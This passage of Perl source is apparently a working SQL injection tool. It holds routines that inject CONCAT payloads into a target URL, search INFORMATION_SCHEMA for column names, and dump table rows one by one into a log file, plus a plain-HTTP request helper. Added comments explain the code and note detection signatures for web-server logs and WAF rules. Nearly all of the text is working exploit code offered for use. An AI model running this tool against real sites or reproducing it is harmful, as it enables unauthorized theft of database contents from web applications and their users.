    if (!$data_count) { print " Failed to get data count.\n\n Halted.\n\n";
    w_log(" Failed to get data count.\n\n Halted.\n\n"); exit(); };
    if ($data_count == 0) { print " No data. Operation halted.\n\n";
    w_log(" No data. Operation halted.\n\n"); exit(); };
    print " [+] Table Name: $table\n";
    print " [+] Column Name: $column\n";
    print " [+] Data Count: $data_count\n";
    w_log(" [+] Table Name: $table\n");
    w_log(" [+] Column Name: $column\n");
    w_log(" [+] Data Count: $data_count\n");
    if ($where ne '') {
        print "\n Special Dump Query: WHERE $where\n";
        w_log("\n Special Dump Query: WHERE $where\n");
        $where = str_replace($where,' ',$spc);
        my $where_count = ssdp_get_data('COUNT(*)',$data_schema.$spc.'WHERE'.$spc.$where);
        print "\n Dumping $where_count Data ...\n\n";
        w_log("\n Dumping $where_count Data ...\n\n");
        for ($x=0; $x<=$where_count-1; $x++) {
            my $inc = ($x+1);
            my $where_query = $data_schema.$spc.'WHERE'.$spc.$where.$spc.'LIMIT'.$spc.$x.',1';
            my $dumping = ssdp_get_data($concat,$where_query);
            if ($dumping eq '') { print " [$inc] No data. Operation halted.\n\n";
            w_log(" [$inc] No data. Operation halted.\n\n"); exit(); }
            open(LOG,">>$log") || die(" [$logo] Cannot open file.\n");
            print LOG "$dumping\n";
            close(LOG);
            print " [$inc] $dumping\n";
        }
        print "\n Done.\n\n";
        w_log("\n Done.\n\n");
    }
    else {
        print "\n Dumping Data ...\n\n";
        w_log("\n Dumping Data ...\n\n");
        # No range given: dump everything. The `$start = 0` is redundant.
        if ($start == 0 and $stop == 0) { $start = 0; $stop = $data_count -1; }
        for ($i=$start; $i<=$stop; $i++) {
            my $inc = ($i+1);
            my $query = $data_schema.$spc.'LIMIT'.$spc.$i.',1';
            my $dumping = ssdp_get_data($concat,$query);
            if ($dumping eq '') { $dumping = '<no data>'; }
            open(LOG,">>$log") || die(" [$logo] Cannot open file.\n");
            print LOG "$dumping\n";
            close(LOG);
            print " [$inc] $dumping\n";
        }
        print "\n Done.\n\n";
        w_log("\n Done.\n\n");
    }
}
  536.  
# -find: print "schema.table.column" for every column whose name matches
# LIKE '%<name>%' — 0x25 is '%', 0x2e is '.', the name is hex-encoded.
# $_[0] schema name, $_[1] substring to look for; with an empty global
# $database the filter uses TABLE_SCHEMA=database(). The global $column is
# also read for the message text.
# Unlike the other listers there is no COUNT(*) pass: it walks LIMIT $i,1
# until an empty result. $status is never changed, so the loop is left only
# by exit() — this sub never returns to its caller.
sub search_columns {
    my $dbhex = $_[0];
    $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
    my $colhex = $_[1];
    $colhex =~ s/(.)/sprintf("%x",ord($1))/eg;
    # Becomes CONCAT(<delim>, TABLE_SCHEMA, '.', TABLE_NAME, '.', COLUMN_NAME, <delim>)
    # inside ssdp_get_data.
    my $concat = 'TABLE_SCHEMA,0x2e,TABLE_NAME,0x2e,COLUMN_NAME';
    my $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
    $dbhex.$spc.'AND'.$spc.'COLUMN_NAME'.$spc.'LIKE'.$spc.'(0x25'.$colhex.'25)';
    if (!$database) { $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
    'database()'.$spc.'AND'.$spc.'COLUMN_NAME'.$spc.'LIKE'.$spc.'(0x25'.$colhex.'25)';
    print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
    else { print " [+] Database Name: $database\n"; w_log(" [+] Database Name: $database\n"); }
    print "\n Searching for Columns Name like *$column* ...\n\n";
    print " [+] Columns Found: \n\n";
    w_log("\n Searching for Columns Name like *$column* ...\n\n");
    w_log(" [+] Columns Found: \n\n");
    my $status = 1;
    my $i = 0;
    while ($status == 1) {
        my $inc = ($i+1);
        my $col_query = $schema.$spc.'LIMIT'.$spc.$i.',1';
        my $result = ssdp_get_data($concat,$col_query);
        if (($result eq '') and ($i == 0)) { print " [$inc] No data. Operation halted.\n\n Done.\n\n";
        w_log(" [$inc] No data. Operation halted.\n\n Done.\n\n"); exit(); }
        elsif ($result eq '') { print "\n Done.\n\n"; w_log("\n Done.\n\n"); exit(); }
        print " [$inc] $result\n";
        w_log(" [$inc] $result\n");
        $i++;
    }
}
  567.  
# Request helper behind every lister and the dumper. Replaces the "c0li"
# placeholder in the global $sqli with CONCAT(0x63306C6923,<select>,0x2363306C69)
# — the delimiters decode to 'c0li#' and '#c0li' — appends $filter (the
# FROM/WHERE/LIMIT tail) and $end, fetches the page via get_content and
# returns the text found between the two delimiters, or '' when they are
# absent. With $convert set the CONCAT is wrapped in UNHEX(HEX(...)).
# $_[0]: SQL expression to select; $_[1]: trailing SQL fragment, may be ''.
# Detection: the two delimiter constants are identical in every request this
# tool sends and are reflected verbatim in the page, so they work as a
# signature in web-server access logs and WAF rules.
sub ssdp_get_data {
    my $select = $_[0];
    my $filter = $_[1];
    my $data = '';
    my $concat = 'CONCAT(0x63306C6923,'.$select.',0x2363306C69)';
    if ($convert) { $concat = 'UNHEX(HEX(CONCAT(0x63306C6923,'.$select.',0x2363306C69)))'; }
    my $query = str_replace($sqli,'c0li',$concat);
    my $content = get_content(0,$query.$filter.$end);
    if ($content =~ /c0li/i) { $data = ssdp_mid_str('c0li#','#c0li',$content); }
    # ssdp_mid_str yields undef when a delimiter is missing; normalise to ''.
    if ($data eq '') { return ''; }
    return $data;
}
  580.  
  581. sub ssdp_mid_str {
  582.     my $left = $_[0];
  583.     my $right = $_[1];
  584.     my $string = $_[2];
  585.     my @exp = split($left,$string);
  586.     my @data = split($right,$exp[1]);
  587.     return $data[0];
  588. }
  589.  
  590. sub str_replace {
  591.     my $source  = shift;
  592.     my $search  = shift;
  593.     my $replace = shift;
  594.     $source =~ s/$search/$replace/ge;
  595.     return $source;
  596. }
  597.  
# One GET request via LWP and its raw body.
# $_[0]: 1 to apply a 10 s timeout and print a marker on an error response,
#        0 for no timeout and no error reporting. Every caller in this file
#        passes 0, so requests can block indefinitely and HTTP errors are
#        returned as page content.
# $_[1]: URL without scheme; "http://" is prepended, so every request goes
#        out over plain HTTP. Honours the global $proxy when set.
# The User-Agent is the bare string "Mozilla/5.0" with no product or
# platform suffix, which by itself is a distinctive value in access logs.
sub get_content {
    my $timeout = $_[0];
    my $url = $_[1];
    my $ua  = LWP::UserAgent->new(agent => "Mozilla/5.0");
    if ($proxy) { $ua->proxy("http", "http://".$proxy."/"); }
    if ($timeout == 1) { $ua->timeout(10); }
    my $req = HTTP::Request->new(GET => 'http://'.$url);
    my $response = $ua->request($req);
    if ($timeout == 1) { if ($response->is_error) { print "\n [$logo] [timeout]\n"; }}
    return $response->content;
}
  609.  
  610. sub w_log {
  611.     my $data = $_[0];
  612.     open(LOG,">>$log") or die(" [!] Cannot create or open log file.\n\n");
  613.     print LOG "$data";
  614.     close(LOG);
  615. }
  616.  
  617. # c0li.m0de.0n